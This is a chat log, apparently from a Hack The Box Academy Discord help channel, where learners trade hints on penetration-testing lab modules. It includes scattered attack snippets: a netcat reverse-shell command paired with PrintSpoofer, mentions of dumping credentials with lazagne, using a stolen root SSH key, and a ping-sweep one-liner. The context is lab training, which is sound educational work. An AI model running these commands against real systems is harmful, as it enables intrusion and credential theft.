iam finish with the BBP but i want to do it again for the exam

rugged stag
west canopy
rugged stag
# shadow willow hm where

If you click on the finished modules, you get to a page where the "Retake Module" button is (where the shareable links are also)

#

Thanks, @west canopy , that one 😆

shadow willow
#

danm

#

do i have to click extra on the "finish" button in the module to come on this page ?

#

but well thx for that

rugged stag
#

Has anyone ever experienced changed behavior after respawning a machine? I just spent hours on an exercise and when I respawned the machine I noticed a slightly different request in burp, which made the solution easy. But before the respawn it behaved differently.

west canopy
#

besides the Starting Point machines buggin' out from time to time

#

I mean your browser is what makes the web request, not the target.

#

you might get a different response in burp. But different request, i think that is client side 😉

rugged stag
# west canopy which module/section specifically? I dont think i have encountered anything like...

"PHP Filters" section in the "File Inclusion" module. It appeared as if the machine from another section was spawned. It was very similar (that's why I didn't notice it at first - I thought it was supposed to be that way), but the request was different.

Before respawn:
http://178.62.107.21:32468/index.php?language=languages/en.php

After respawn:
http://206.189.117.48:30013/index.php?language=en

Or maybe I did something wrong without noticing it. No idea.

west canopy
#

ah i see what u mean

rugged stag
short brook
#

Hey, I am stuck at module "Getting started" 'pentesting basics/priviledge escalation'

#

I am logged in the server as user2, but do not know how to get to root

west canopy
#

@short brook take a look inside ||/root ||

#

specifically there is something we can do using|| ssh keys|| to help us escalate to root 😉

candid sandal
#

Guys, what does it mean when we don't receive any response to a request in Burp ?

west canopy
#

it means the server is hanging

#

or its executing your code 🙂

foggy stirrup
#

uhh

#

@west canopy do u happen to know which acc on MS01 i can log into using the creds from SQL01

short brook
#

I'm literally gonna cry. I don't understand ssh and the keys and whatnot

foggy stirrup
#

i ran ||lazagne|| and found the ||DefaultPassword||

foggy stirrup
west canopy
#

@foggy stirrup the user should be ||mssqlsvc|| .... i think i dumped the password with ||lazagne|| but its kind of unclear in my notes... the password is in a weird format and kind of hard to see

foggy stirrup
#

SSH private keys are basically passwords u can use them to login

foggy stirrup
#

i got this

#

but it cant login weirdly

west canopy
#

@foggy stirrup yes the password is hard to make out

#

sec ill DM you

foggy stirrup
#

sure thing

#

thx

candid sandal
short brook
west canopy
#

well ... if the server replies with a 200 then it's a success... and a 404 means the resource doesn't exist

#

what does it mean if we don't get a response from the server?

foggy stirrup
dire sentinel
#

On attacking common services - DNS. Seen similar posts in here about finding one or MANY subs based on the tool used, im in the same boat. Found ||hr.inlanefreight.htb|| which seems to be the best lead, but unable to enumerate anything useful. A nudge would be appreciated 🙂

short brook
foggy stirrup
#

oh ok

#

il dm u

candid sandal
#

That's the thing, I am using the repeater to send a post request and when I click on 'send', nothing, no response. When I try the request manually with the browser, the server does respond so the problem doesn't seem to come from the server

west canopy
#

@short brook we want to make a copy of the id_rsa file so we can have one on our attack machine. From there, we can run chmod 600 against the id_rsa file, and then use it to SSH in as the root user.

short brook
west canopy
#

DM me 😉

flat silo
#

So I'm on the web proxy module I need to locate the second flag I can see the root directory, since the clue is that the flag is in a different directory I know it's there but how do I get into it. I'm pretty sure I followed the breadcrumbs but just ended up back with the original flag

west canopy
flat silo
#

For the first flag

west canopy
#

maybe|| flag.txt ||and|| /flag.txt|| are different...?

flat silo
#

Thank you

timber hatch
#

hi there
at the moment i'm at the module metasploit. the section encoders did really catch my attention...

at the end of this sections it is written: As expected, most anti-virus products that we will encounter in the wild would still detect this payload so we would have to use other methods for AV evasion that are outside the scope of this module.

Does Anybody know if there is another Module at htb academy who is going deeper into that field - encoders and eventually malware analysis?

rustic sage
#

Hi im working on the wordpress module for the skill asessment. I have gotten acess to the ||erika|| account but I cannot update the theme editor since I keep getting this error: Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means such as using SFTP.

#

Does anyone know how to fix this?

acoustic owl
barren minnow
#

Who can help get my ssh key

timber hatch
short brook
faint trellis
#

AD Enumeration & Attacks - Skills Assessment Part II
Who had faced with the following issue before while escalating privileges using PrintSpoofler.exe?

c:\Users\Public\nc64.exe 172.16.7.240 4444 -e cmd: forward host lookup failed: h_errno 11001: HOST_NOT_FOUND

vale salmon
#

Mind if I ask how you solved this issue? I am also running into it

remote solar
#

hey can someone please help me?
I cannot seem to figure out how to load this unsigned powershell module.
I try to use the set-execution policy directive but I don't understand what I am doing wrong ...

stiff moon
stiff moon
vale salmon
#

Ah, cool, thanks! I have to run out, but I'll look into it more later.

flat silo
#

Can anyone point me in a direction with decoding the flag for the web proxy module. I'm running it through burp encoding it with url and base 64 as the hint said and I'm getting no where

west canopy
flat silo
#

That's not working

#

I'm on encoding/ decoding the challenge states: the string found in the attached file has been encoded several times with various encoders. Try to use the decoding tools to get the flag. Hint use base 64 and url encoding. I've encoded the string with both multiple times. I've tried to decode the string with both i

west canopy
#

yes try base64 decoding multiple times

#

then switch to a different type of decoding 😉

median bison
#

I know its right in front of my face and im just missing it however, I need to do the scan for the Public Exploits module and I can not think of what I should use to scan it with. I know nmap only works for devices on your local network/vpn. What am I missing?

TLDR: How do you scan IP's that arent on your network again?

west canopy
ornate orbit
#

Hello, I'm new to HTB and have newbie issues. I'm on the module HTTP Headers and I have found flag_...., but when I paste it into the answer section it says it is not right. Am I supposed to find a way to open the .txt file?

west canopy
#

make sure you don't have any formatting errors like a trailing space at the end

ornate orbit
dense rock
#

Doing the Setting Up module, I'm right at the end, hardening my VPS, but now that I'm trying to log back in after setting up 2FA I'm getting this error

Permission denied (publickey)
west canopy
#

can you undo the change ?

dense rock
#

Restoring sshd_config seems to fix it

eternal sandal
#

erm so that error is from ssh
make sure public key use is enabled + you have the right keys in authorized_keys

hollow thunder
raven cairn
#

Could I have help with the session security skills assesment?

#

I am confused what it is wanting me to do haha

#

I found an XSS endpoint -- was pretty easy

#

I also know how to do session hijacking with XSS.

vital adder
#

try to use some of the ||cookies stealing|| method show in that module after you got the url payload send to given api so the admin can click it

raven cairn
#

I see the /submit-solution page

vital adder
raven cairn
#

Something like this?

#

I'm probably really stupid but I really don't know how to send with the given api

vital adder
#

no there should be some instructions on that web page

raven cairn
vital adder
vital adder
west canopy
#

session security skill assessment had me geeking out for three days

#

when i finally got it i was so hyped

#

i may have dropped some F bombs

#

and claimed myself a god

vital adder
#

for the session security skill assessment i completely forgot about the api so i was stuck for a few hours trying to figuring out what to do next

haughty jay
#

Hi all, in the Skills Assessment - WordPress the error "Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP." its normal or i've just broke the machine?

#

or this is just not the way?

raven cairn
#

Probably overthinking it

west canopy
#

there's a little twist

#

with the ||blog ||page

#

unless you set the vhost, then it looks like the target isnt wp

haughty jay
#

I already have the blog and the girls name and password

#

im triyng to get the payload working on the template

#

but wordpress gave me that error

#

changed the admin password and tried to login with admin and change the template but it wont let me

vital adder
#

try with themes instead of template

haughty jay
#

i tried on 404.php, archive.php, etc

vital adder
#

did you do that with the twenty nineteen theme?

haughty jay
#

can I dm you?

vital adder
#

sure

raven cairn
#

THanks Mrtom and Jarednexgent

#

Super close to finishing all CBBH modules

west canopy
#

heck yes

#

get some

autumn elk
#

Did you ever get the Advance File Disclosure to work?

#

With the Advanced File Disclosure did anyone have trouble with the CDATA or the Error based way to get the data?

vale salmon
#

Did you ever find a fix for this?

timber light
#

Hi, just want to check for Attacking Common Services - Easy is the correct path to get the flag going through ||the sql and creating a webshell and then trying to get a reverse shell from there?|| Seems kind of over complicated to me. Maybe im just bad.

hollow thunder
rustic sage
#

do i HAve to keep it legal

languid dawn
#

Yes.

unborn jewel
#

I just finished the "getting started" module, and I wanted to verify for the Knowledge Check.. was it actually possible to recover the username/password ? I ended up solving it with help from metasploit, but I spent a week and a half trying to figure out how to manually tackle the task.

timber light
#

hi for downloading all files in ftp there is this command wget -m --no-passive ftp://anonymous:anonymous@<target> but how do i download all from non-standard port?

languid dawn
#

Read our #rules 7. Do not advertise.

knotty crag
#

sorry

foggy stirrup
#

yayyyy

#

we win these

timber light
#

Can anyone help me on Attacking Common Services - Hard the last part on flag.txt? kinda lost after almost the whole day. :<

tame lantern
#

Is the Username Brute Force module missing a username wordlist? I can't find the one they say to use and I've tried many different things.. I overcomplicate things often so I know that's likely the case here I'm just stuck.

#

JFC nevermind I'm stupid. By 'section' I thought they meant earlier on the same page.

balmy moon
#

Can I get a hand with the footprinting lab - hard? I am struggling with the SNMP walk.

timber light
balmy moon
#

Thanks @timber light. I tried and discovered that I'm not doint it right.

brave prawn
#

Can I DM someone about Chisel section in Tunneling, Pivoting and Port Forwarding module?

fathom bay
#

Hey, i am doing the footprinting module > the medium skill assesment lab. I managed to log in with a priviledged account but when i check the database its empty. am i missing something?

balmy moon
#

@fathom bay DM me

vital adder
#

hi i need some help with the Footprinting module DNS section last question i found 20 subdomain try to do a dns zone transfer with all of it and try the dnsenum tool show in that section with all 20 subdomain but no luck

brave prawn
acoustic owl
candid sandal
#

I'm a bit confused, do we necessarily need the VIP membership to start hacking some machines on HTB ?

vital adder
candid sandal
#

So it is not possible to hack retired machine withou vip ? Here https://app.hackthebox.com/vip it says 2x Machines for the free plan and 190+ Machines for VIP

vital adder
#

no idea i think 2x Machines mean you can only access 2 retired machine maybe?

candid sandal
#

I think so, I tried to start the instance of the easy machine You know 0xDiablos and it worked, but for others it asks for the VIP subscription

vale salmon
#

Has anyone had, and found a fix for the libcrypto.so issue with ptunnel on the target machine in the Pivoting with ptunnel section?

twilit bluff
#

is hack the box crashed?

#

i'm trying to connect but it responds with bad gateway error

edgy ibex
languid dawn
#

It seems to be down just now, please just wait a couple minutes

twilit bluff
#

no problem it was just for info

vital adder
#

got it thanks @brave prawn @acoustic owl and i'm so dumb, i found the right subdomain but i can't do a dns zone transfer with it so i didn't even check that subdomain ip 🤣🤦‍♂️ got stuck for a good while

flint agate
zenith schooner
#

HI, anybody on Penetration testing process?
I think there is an error on a question: What is the name of the security regulation for credit card payments a company must adhere to?

vital adder
vital adder
#

and section

flint agate
#

if I ls it gives me the flag from the exercise before

#

I need to find another flag

vital adder
#

use ls with a different directory

zenith schooner
flint agate
#

how can I do that ? Give a an example pls

zenith schooner
#

Ask for Security regulation but the answer is almost the same under Framework.

#

So, not sure if it is ok or I am wrong.

vital adder
vital adder
flint agate
#

so I should try ls root for example ?
I know the commands but I am now learning burp sweet so it is a bit unusual

#

I did pwd and I am in /var/www/html.

vital adder
#

in burp you can just run normal linux command just url encode that with ctrl + U

flint agate
#

I think I am doing some mistakes somewhere

vital adder
#

shoot me a dm if you still have issue that

fading bough
#

how can i dowload hackthebox

#

i checked the page and i could find the download link

raven cairn
#

🤣

raven cairn
rustic sage
#

^ so true

short brook
#

I just finished the Getting Started module. I feel so refreshed. Now Imma take a nap🤣

raven cairn
#

I remember that module being brutal for a beginner haha

#

Plus Nibbles is a horrible first box to do

short brook
#

It was awful yes, but atleast I learned something. Now I have to start with Network Enumeration with NMAP

fading bough
#

hopefully next year amd drop a 32 core cpu @ 8.6 Ghz

#

and all their cpu have a boost frequency of 8.6 Ghz

#

and some big cpus of 64, 128, 256, 512 cores

#

for server and work station

fathom bay
#

hey can anyone give me a nudge on how to start the footprinting hard lab? i did an nmap and only got an imap/pop3 server and i cant get anything out of it cause i think i need a login

rigid minnow
#

Could someone give me some help on DNS Footprinting on the last question What is the FQDN of the host where the last octet ends with "x.x.x.203"?"

feral stump
#

Dm me 😊

novel yarrow
#

Infrastructure is down? Machines not pinging

#

From vpn and pwnbox

frigid summitBOT
#
Estakado#8719 has been warned

Reason: Mass mention

wary river
#

is there someone that can help me with the public exploits section of getting started?

frail garden
#

@rigid minnow DM me

dire sentinel
#

Attacking Common services - easy. Have creds for ||fiona||. Found the ||.txts in the mysql database and what they curl||. Based on past labs, this is a hint to put a ||reverse shell in one of the directory's in the .txts||. Have been unsuccessful in doing so, would appreciate a nudge :). Also tried to ||deliver payload via mysql for rev shell||, no bueno

polar crag
#

guys im trying to enum the user names in the Footprinting Module / SMTP

Downloaded the footprinting wordlist and using this command

||smtp-user-enum -M VRFY -U /home/kali/Desktop/footprinting-wordlist.txt -t 10.129.xx.xxx||

#

but it gives me 0 results

#

i even checked the next section and there is the answer so i modified my wordlist with just that name and tried again

#

still 0 results.

#

i dont get it

#

so the metasploit method worked fine

#

but i do not understand why the smtp-user-enum didnt wokred

wary river
shut orchid
#

someone give me a paypal account with no balance to keep my money

#

😌 🙌

#

😎🌿🔥

balmy moon
#

Can I get help with the footprinting Lab - Hard. I have access to the db and having trouble with decryption. 🙃

shut orchid
#

someone send me windows xp

stray grove
stray grove
ashen dagger
#

Do I need a specific wordlist? I'm stuck

stray grove
balmy moon
#

The hashes I found in the db? Trying to get to the HTB, didn't find that but other creds...

stray grove
#

you don't need the hashes, once on the server you can list all databases available in there and use ||select * from users;|| you'll eventually find the pass

balmy moon
#

May I dm you?

stray grove
#

sure

hollow thunder
#

If im not getting scan results should i just reset the box

#

on attacking common services hard

delicate needle
fringe shell
#

Hey, anyone here done the Linux PrivEsc Assessment? I've had to skip flag1 and after finding 2,3,4 i decided to circle back.

I've found the ||cat /var/www/html/flag1.txt entry in ./bash_history|| but the actual file doesn't exist.** Is this just a red herring? **

I've also used find / -name flag1.txt 2>/dev/null and the file can't be found.

west canopy
#

@fringe shell check for hidden files/folders 😉

fringe shell
#

@west canopy thanks for the help... privesc to root gave me less trouble than that dang flag

vale salmon
#

For Pivoting, Tunneling, and Port Forwarding with SocksOverRDP, I am having a spot of trouble. I have SocksOverRDP running on the connection with username:victor and I have Proxifier configured for 127.0.0.1:1080, but when I try to use mstsc.exe from the main target to connect to the final target, it keeps telling me the Remote Connection won't work, and it doesn't show up in Proxifier. What am I doing wrong? For serious? It didn't like me running mstsc.exe from an Administrator command prompt. 🙄

slender jay
#

Has anyone done the Footprinting module for the DNS challenges? Finding the FQDN that ends in x.x.x.203 has me stumped. I tried zone transferring to every subdomain and brute forcing with multiple word lists. Coming to a dead end tbh

night pier
#

Anyone able to help me out on Attacking Enterprise Networks Post Exploitation? I've got everything in place but no shell after running dc_shell.exe

wide river
#

Hi, im new to HTB and currently stuck at food printing FTP. The question is " Which version of the FTP server is running on the target system? Submit the entire banner as the answer." I thought it was "220 InFreight FTP v1.1" but it seems not correct. is there anyway to find the answer? thank you

slender jay
#

220 is a ftp status

#

*return code

wide river
#

so how can i get to the right answer

slender jay
#

I cant tell you that

graceful parrot
#

The same thing is happening to me, were you able to solve it?

fringe shell
vale salmon
#

Okay, I am stuck on Question 3 of the Skills Assessment for Pivoting, Tunneling, and Port Forwarding if someone has a moment.

wide river
#

it doesssss, thank you !!!

vale salmon
# stray grove what was the question again?

I found the credentials for ||mlefay|| and I thought I found the first internal server, from the webshell, at ||172.16.5.15|| but that seems to not be the answer to the question, so I'm not sure what I'm otherwise looking for, or where to go from here.

stray grove
#

have you run a ||ping sweep scan?|| if you did, you'll find another host on that network

vale salmon
#

See this is why I need to organize and maybe color code my notes. I thought I could only use msfconsole for that. I completely overlooked using code for it. Thanks.

#

Hmmm. It's tossing back ||ping: 172.16.5.{1..254}: Name or service not known||

stray grove
#

try the one liner command instead

vale salmon
#

This is what I used: ||for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done||

stray grove
vale salmon
#

No dice. Doesn't give me anything. As a side note, I kinda hate this webshell.

stray grove
#

DM

slender jay
west canopy
#

@vale salmon do you still need help with port forwarding skill assessment?

night pier
#

Anyone able to help me out on Attacking Enterprise Networks Post Exploitation? I've got everything in place but no shell after running dc_shell.exe

woeful oxide
#

Hey guys

#

I cannot get the flag on the Server Side Attacks - SSTI I

#

I got the shell connected to the target but I don't understand how to access the environmental variables

west canopy
west canopy
night pier
west canopy
#

@night pier DM me 😉

woeful oxide
#

I've tried using the shell and ||{{dump()}}||

west canopy
fathom mortar
#

Hey Guys,
can anyone help me in the Module Password Attacks ?

fathom mortar
#

Im stuck at crackmapexec and the smb user
i enumerated the credentials and also the share, but when i make the ls command, it says status denied. And its the only free share. What am I supposed to do

rustic sage
#

Are you using an account that has read access to the share?

dense ferry
#

So is there any idea when the CPTS exam will actually be released?

rustic sage
#

Can anyone help with the Password attacks module - Password mutations?
The scans are running too slowly to be able to complete in the time the box gives you, both on my Kali VM and PWNBOX

ancient prism
#

hello

#

i am stucked at final section of SQL injection

#

can anybody help me to solve loginpage

rustic sage
ancient prism
#

no

#

i am stucked at login page

#

i tried every possible pyloads but it fails

rustic sage
#

make sure you're not forgetting the space

ancient prism
#

yes i am sure

#

i not forget it but still not able to log in

rustic sage
#

The aim is not necessarily to login...

#

Hello! I'm stucked at Skill Assessment - Broken Authentication. Who can help me? I may explain my problem in private chat, because there may be many clues for others

ancient prism
#

please give me something hint to log in

rustic sage
ancient prism
#

i got it my ans

#

create my own paylod for it and get success

ancient prism
rustic sage
#

Good, took me a while to finish my password attacks module to be able to spin up that box to remember what I had to do

rustic sage
#

You can, if I can remember or am not in the middle of another long scan I'm happy to help!

proven brook
#

Hello, i need help for the Attacking Common Services - Easy. What i already did: I found two txt files on the ftp server. I noticed that i can write and read files with MySQL. I also noticed in the docu that i have to put my files into \xampp\htdocs to excecute them. But i cant get my reverse shell working. Please i'm stuck for about 4 hours and i'm done Edit.: Did it. i used / instead of \

flint agate
#

Can you complete the Burp Intruder module using ZAP ?

rustic sage
woven copper
rustic sage
#

whats up?

rustic sage
# woven copper Did you identify the password policy ?

Yes. I created command to make wordlist:
||sudo grep '^[[:upper:]]' 'rockyou.txt' | grep '[[:lower:]]'| grep '[[:digit:]]$' | grep -E '^.{20,}' | grep '[@#$]'||
14 passwords. and 4 usernames + support and guest. 6 usernames or more?

violet geyser
#

What does the OWASP Top 10 list name the classification for this vulnerability?

#

This is for Sequel Injection ive tried every classification and cannot seem to find the right one

#

Can anyone help

rustic sage
#

Which of the 10 listed vulnerabilities does SQL injection fall under?

violet geyser
rustic sage
#

No, trying to give a hint

#

also make sure you are getting the answer from the correct source

violet geyser
#

Ok thank you

nova thistle
#

Hello, I'm quite confused on where to start from? In the academy, The first course i see is penetration testing process. However as im going thru it, it's giving me references of other modules within it. I'm confused whether if should complete those first (e.g networking a 6 hour different module) or carry on with this module

#

In short, where do I start from as I'm a neophyte

rustic sage
nova thistle
#

Oh thank you i never got the getting started module or might have missed it

#

Also is there a certain guideline to follow for the modules?

violet geyser
rustic sage
#

I find it helps to select the tier you want, and also note they are not displayed in a particular order so look through and choose what you want to do next, some of the knowledge or career paths can help, but may not be limited to tier 0 if you are a free user

brave prawn
#

Hey, can I DM someone about Skills Assessment in Pivoting, Tunneling, Port Forwarding module?

proven brook
proven brook
brave prawn
vale salmon
oak summit
#

@vale salmon great i may try that as well

shrewd bolt
#

Hi, is someone available for some help on the Skill Assessment of the module Linux Local Privilege Escalation? I got flags 1 through 4 and have a rough idea on how to get the fifth one but I can't understand if it does not work because of the type of shell I managed to create. Thanks prayge

twilit bluff
#

Hi, is someone available to help me on the final question of Getting started module web enumeration section

rustic sage
graceful parrot
lethal atlas
zealous summit
#

I am currently in the public exploits module of the getting started and when I try to connect to target machine it is unpingable

#

I have tried both being connected to vpn and not

lethal atlas
#

@zealous summit not all machines respond to ICMP. The target is still there.

lethal atlas
zealous summit
#

Thank you 🙂

brave prawn
#

Need help with Skills Assesment in Pivoting, Tunneling, Port Forwarding module. Stucked on the next to the last question, can someone help?

sturdy igloo
#

anyone completed Password Attacks - Password Reuse / Default Passwords that can help with "Use the user's credentials we found in the previous section and find out the credentials for MySQL. Submit then credentials as the answer. (Format: <username>:<password>)"

zealous summit
#

you should be able to just go back a few pages and grab the credentials

nova thistle
#

It's the same as this users question.
From what I've read i have to use netcat (ip) (port) but it's not working

#

or maybe im just wrong

#

Nevermind i figured it out. In the target it gives the port with colon but if you run it the result won't show up

#

you have to add space between the port and the ip

tame lantern
#

Any chance someone could give me a nudge on 'Skills Assessment - Website' for the Login Brute Forcing module? I feel like I'm missing something fundamental but simple..

sage jackal
#

Hello on Windows Privilege Escalation; DnsAdmins section I followed the steps and I added myself to Domain Admins group but I still get access denied on everything and can’t read the flag, any help?

tame lantern
# lethal atlas what question?

Just the first one. I'm trying something though, standby.. I forgot about one of the sections, but I think I might know what to do.

lethal atlas
#

simple hydra command will do.

tame lantern
#

Yeah something I haven't really understood is isolating which wordlist(s) to use. rockyou.txt would take forever so I'm just trying what I can.

lethal atlas
#

I understand that. I used the same wordlist they used in the examples. ftp-betterdefaultpasslist .txt

tame lantern
#

Ah, good catch. Thanks!

#

Gah I have such a problem overcomplicating things. I got it, thanks @lethal atlas

lethal atlas
#

yw

twilit bluff
#

someone can help me to find the right exploit for Simple Backup plugin 2.7.10 for wordpress

zealous summit
#

have you tried using searchsploit

twilit bluff
#

yes

#

i have found this exploit but nothing happen auxiliary/scanner/http/wp_simple_backup_file_read

sturdy igloo
#

need help Password Reuse / Default Passwords for mysql in module Password Attacks. Have tried all previous user:pass but no luck

twilit bluff
zealous summit
#

catta im on the same module

#

I have found a lot of filtered services

gloomy tangle
gloomy tangle
# sage jackal How can I do that?

when you have done all the procedure, on your windows target, go to windows icon and restart. then connect again with remmina or other.

sage jackal
zealous summit
#

im on public exploits in getting started

#

and I cant seem to complete an nmap scan, in any kind of reasonable time, my first scan with just -Pn took so long my target system reset

zealous summit
#

can anyone confirm whether or not we should be trying to exploit filtered services?

#

or ignorning those

rocky ice
#

YES BUT THE OTHER PEOPLE ARE DOING BAD THINGS

placid quest
#

@zealous summit check the vpn

#

@twilit bluff try to change on the file

zealous summit
placid quest
#

@zealous summit try to ping

zealous summit
placid quest
#

@zealous summit That looks like a web site since it has the ip and the port

zealous summit
#

--- 178.62.91.197 ping statistics ---
4 packets transmitted, 0 received, 100% packet loss, time 3072ms

placid quest
#

@zealous summit try see if you can access the web site

zealous summit
#

no response from curl or browser

#

OH GOOD grief,, thank you for advice about checking it as a website

west canopy
zealous summit
#

are you connected to vpn?

nova thistle
#

I got the same issue

#

i couldn't complete nmap scan

lethal atlas
#

if there is a port designation. such as 178.62.91.197:30269 you cant use the whole thing for ping or nmap. the 30269 is the port number. so for nmap leave it off or specify it with -p. As far as pinging, like @west canopy said if its a docker it likely wont respond.